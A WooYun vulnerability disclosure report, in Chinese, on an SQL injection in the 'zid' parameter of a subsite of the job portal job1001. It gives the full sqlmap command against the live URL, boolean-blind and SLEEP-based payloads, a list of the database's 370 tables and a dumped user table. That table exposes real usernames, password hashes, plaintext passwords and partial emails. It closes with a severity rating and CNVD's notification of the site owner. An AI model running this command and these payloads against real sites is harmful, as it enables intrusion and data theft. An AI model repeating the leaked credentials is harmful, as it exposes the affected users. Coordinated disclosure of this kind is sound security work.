乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-29: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
一览英才网分站存在SQL注入漏洞,大量信息泄漏
1. 测试SQL注入漏洞
sqlmap.py -u "http://**.**.**.**/zhuanti/zhuanchang/index.php?zid=3981359526867737"--dbs --level 3 --risk 3 --random-agent --current-user --users --is-dba --password --threads=10
Parameter: zid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zid=3981359526867737 AND 3154=3154 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.12current user: 'readJob1001only@**.**.**.**%'current user is DBA: Falsedatabase management system users [1]:[*] 'readJob1001only'@'**.**.**.**%'available databases [3]:[*] information_schema[*] job1001[*] test
Parameter: zid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zid=3981359526867737 AND 3154=3154 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.12Database: job1001[370 tables]+-----------------------------+| Area_navigation || News_company || Person_DelBk || Person_DelBk_slave || Trade_OtherLogin || Trade_OtherLogin_Rel || 20151024top10_company || 20151024top10_vote || apply_add || attachfile || authcode_mobile || campus_companyApply || campus_trade || campusnews || cfavorite || cfavoriterecycle || cfolder || chinavc_agents || cmailbox || cmailbox_acceptfile || cmailbox_c1 || cmailbox_c10 || cmailbox_c100 || cmailbox_c101 || cmailbox_c102 || cmailbox_c103 || cmailbox_c104 || cmailbox_c105 || cmailbox_c106 || cmailbox_c107 || cmailbox_c108 || cmailbox_c109 || cmailbox_c11 || cmailbox_c110 || cmailbox_c111 || cmailbox_c112 || cmailbox_c113 || cmailbox_c114 || cmailbox_c115 || cmailbox_c116 || cmailbox_c117 || cmailbox_c118 || cmailbox_c119 || cmailbox_c12 || cmailbox_c120 || cmailbox_c13 || cmailbox_c14 || cmailbox_c15 || cmailbox_c16 || cmailbox_c17 || cmailbox_c18 || cmailbox_c19 || cmailbox_c2 || cmailbox_c20 || cmailbox_c21 || cmailbox_c22 || cmailbox_c23 || cmailbox_c24 || cmailbox_c25 || cmailbox_c26 || cmailbox_c27 || cmailbox_c28 || cmailbox_c29 || cmailbox_c3 || cmailbox_c30 || cmailbox_c31 || cmailbox_c32 || cmailbox_c33 || cmailbox_c34 || cmailbox_c35 || cmailbox_c36 || cmailbox_c37 || cmailbox_c38 || cmailbox_c39 || cmailbox_c4 || cmailbox_c40 || cmailbox_c41 || cmailbox_c42 || cmailbox_c43 || cmailbox_c44 || cmailbox_c45 || cmailbox_c46 || cmailbox_c47 || cmailbox_c48 || cmailbox_c49 || cmailbox_c5 || cmailbox_c50 || cmailbox_c51 || cmailbox_c52 || cmailbox_c53 || cmailbox_c54 || cmailbox_c55 || cmailbox_c56 || cmailbox_c57 || cmailbox_c58 || cmailbox_c59 || cmailbox_c6 || cmailbox_c60 || cmailbox_c61 || cmailbox_c62 || cmailbox_c63 || cmailbox_c64 || cmailbox_c65 || cmailbox_c66 || cmailbox_c67 || cmailbox_c68 || cmailbox_c69 || cmailbox_c7 || cmailbox_c70 || cmailbox_c71 || cmailbox_c72 || cmailbox_c73 || cmailbox_c74 || cmailbox_c75 || cmailbox_c76 || cmailbox_c77 || cmailbox_c78 || cmailbox_c79 || cmailbox_c8 || cmailbox_c80 || cmailbox_c81 || cmailbox_c82 || cmailbox_c83 || cmailbox_c84 || cmailbox_c85 || cmailbox_c86 || cmailbox_c87 || cmailbox_c88 || cmailbox_c89 || cmailbox_c9 || cmailbox_c90 || cmailbox_c91 || cmailbox_c92 || cmailbox_c93 || cmailbox_c94 || cmailbox_c95 || cmailbox_c96 || cmailbox_c97 || cmailbox_c98 || cmailbox_c99 || cmailbox_p1 || cmailbox_p10 || cmailbox_p11 || cmailbox_p12 || cmailbox_p13 || cmailbox_p14 || cmailbox_p15 || cmailbox_p2 || cmailbox_p3 || cmailbox_p4 || cmailbox_p5 || cmailbox_p6 || cmailbox_p7 || cmailbox_p8 || cmailbox_p9 || cmailboxrecycle || cmailstext_100 || cmailstext_101 || cmailstext_102 || cmailstext_103 || cmailstext_104 || cmailstext_105 || cmailstext_106 || cmailstext_107 || cmailstext_108 || cmailstext_109 || cmailstext_110 || cmailstext_111 || cmailstext_111_20150622 || cmailstext_112 || cmailstext_113 || cmailstext_114 || cmailstext_115 || cmailstext_116 || cmailstext_117 || cmailstext_118 || cmailstext_119 || cmailstext_120 || cmailstext_121 || cmailstext_122 || cmailstext_123 || cmailstext_124 || cmailstext_125 || cmailstext_126 || cmailstext_127 || cmailstext_128 || cmailstext_129 || cmailstext_130 || cmailstext_131 || cmailstext_132 || cmailstext_133 || cmailstext_134 || cmailstext_135 || cmailstext_136 || cmailstext_137 || cmailstext_138 || cmailstext_139 || cmailstext_140 || cmailstext_999 || common_zwmc || common_zwmc_trade || company || companyEmalDealRepeat || companyImage || company_canlogin || company_contact || company_daishan || company_locked || company_rborder || company_resume_temp || company_resume_temp_recycle || company_score_class || company_score_logs || company_searcher_type || company_slave || company_version || company_zp_searcher || companynews || companyserver || companyserver_fankui || companyserver_sub || companyzwnumlog || deptRel || email_company_temp || fujian || groupRel || gzpinpai_feedback || gzpinpai_reply || gzpinpai_server || gzpinpai_server_sub || hotJobs || hrinfo || hrsalaryinfo || hunter_job || hunter_resume || hunter_resume_log || ip_address || ip_locked || jifen_gift_role || jifen_type || mac_login || map || menudefine || menudefine_new || menudefine_new_other || notice || noticeAppend || noticeImages || noticeMenu || noticeTemplate || oem || personRecentlySearch || person_cer || person_join || person_recommend || personen || pfavorite || pmailbox || pmailbox_mailtext || question || region || region_daili_apply || reply || resume_template || role_new || role_new_other || role_type || roledata || roledata_new || roledata_new_other || roletotype || safety_help || school || school_all || school_dump || school_trade || schoolcampay || schooldown || schoolnews || shop_admin || shop_admin_other || stat_region_fp || sysmenu || sysmenu_new || sysmenu_new_other || system_dept || system_dept_user || tjPerson || top10_activity || top10_comm || top10_company || top10_vote || total_trade || trade || tradeClass || trade_aboutus || trade_area || trade_class || trade_index_guzhu || trade_index_mingqi || trade_index_navigator || trade_index_xjh || trade_region || trade_rel_show || trade_zt_index || trade_zw || trade_zw_new || trade_zw_person || trade_zw_person_bak || trade_zw_position_job_index || trade_zw_position_person || trade_zw_position_rel || trade_zw_position_remark || trade_zw_position_suggest || trade_zw_post_nav || trade_zw_rel_wenku || trade_zw_step || tradecampus || vipAppend || vipAppendBasic || vipImagesType || vipMenu || viptemplate || viptemplateType || vvipDefaultImg || vvipDefaultImgType || yilanbi_logs || yqlj || zp || zpJob1001 || zpTj || zp_checklog || zp_hunter || zp_slave || zph_class || zph_image || zph_jobs || zph_list || zph_logo || zph_masterTable || zph_media || zph_slaveTable || zph_template || zph_xinwen || zph_yg || zphzcActive || zphzcColumn || zphzcZphList || zprecycle || zptxt || zptxt_master || zptxt_salve || zw || zw_hot || zw_new || zw_person_gj || zw_zwdesc || zwfolder || zwlb || zwlb_new || zwlb_share || zwlbrep || zwlbrep_new || zy_zw_match || zyclass || zyclass_new || zyrep || zyrep_new || zytemp || zytemp_new |+-----------------------------+
Parameter: zid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zid=3981359526867737 AND 3154=3154 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.12Database: job1001Table: Person_DelBk[11 entries]+---------------+-----------------------------------------------+--------------+--------+---------------------------+| uname | pwd | password | certId | email |+---------------+-----------------------------------------------+--------------+--------+---------------------------+| jfjl | F$SfcB9PV_#S | 971007 | 0 | dhjwdd@**.**.**.** || lsc198971cs | f029c3a60e67928b1e6542a2725dd2a4 | wo198971cs | 0 | 527458379@**.**.**.** || 冬日雾雨 | f05154d221d3ff793fe52c1df0901fd4 | 9716810506 | 0 | <blank> || liliang0909 | f22eecde7c0861ff995ab7547934d8a5 | 09nianfadaca | 0 | dandan1668@**.**.**.** || zhoutao123456 | f2e2258a1df5c4dbad2822dea034df3b | 2510290 | 0 | [email protected] || Befbrinekniny | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | [email protected] || Coghoimeemefe | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | [email protected] || JarPeamma | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | [email protected] || Pypesters | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | [email protected] || Acireelia | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | [email protected] || Vorsmanna | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | [email protected] |+---------------+-----------------------------------------------+--------------+--------+---------------------------+
表太多就不一个一个刷了
过滤
危害等级:中
漏洞Rank:9
确认时间:2015-11-02 19:29
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无
